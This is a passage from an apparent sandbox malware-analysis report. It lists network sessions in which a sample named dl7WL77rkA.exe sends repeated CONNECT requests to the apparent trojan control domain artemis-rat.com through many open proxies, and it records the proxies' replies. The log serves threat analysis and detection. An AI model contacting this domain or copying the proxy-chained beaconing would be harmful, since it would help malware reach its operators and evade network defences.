                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.702281952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.948101044 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            782192.168.2.552374137.184.142.374433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.598787069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            783192.168.2.552266104.16.226.6803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.599039078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.753279924 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            784192.168.2.55151043.255.113.23280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.601114035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            785192.168.2.552376137.184.142.374433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.601330042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            786192.168.2.552273185.162.229.127803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.615199089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.769377947 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            787192.168.2.55216291.202.230.21980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.629513979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            788192.168.2.552194163.172.165.36163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.630141973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.704706907 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            789192.168.2.551520148.72.215.79472023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.630142927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811131001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            790192.168.2.55153791.201.240.8456783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.630357027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            791192.168.2.551870199.58.185.941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.634901047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            792192.168.2.552377137.184.142.374433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.655953884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            793192.168.2.552291104.18.251.208803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.659065962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.813730955 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            794192.168.2.552195147.75.34.85100073876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.659070015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.965341091 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-Agent: Zscaler/6.3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            795192.168.2.55217037.235.48.19803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.661433935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            796192.168.2.55225298.162.25.4316543876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.665117979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            797192.168.2.55221745.128.133.24110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.665653944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            798192.168.2.552296162.159.242.62803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.666517019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.827595949 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            799192.168.2.552200219.243.212.11884433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.676711082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.004148006 CET22INHTTP/1.1 502 ERROR


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            800192.168.2.552231196.20.125.14980833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.676824093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            801192.168.2.55225838.162.3.10931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.697005987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.166714907 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            802192.168.2.552229147.75.34.85100113876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.708674908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.009274960 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-Agent: Zscaler/6.3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            803192.168.2.5522043.37.125.7631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.708739996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.029081106 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            804192.168.2.552171118.69.233.16580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.709196091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.592356920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.266571045 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            805192.168.2.55218045.11.95.16550383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.709295988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            806192.168.2.549883148.66.130.53239983876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.709391117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.904828072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
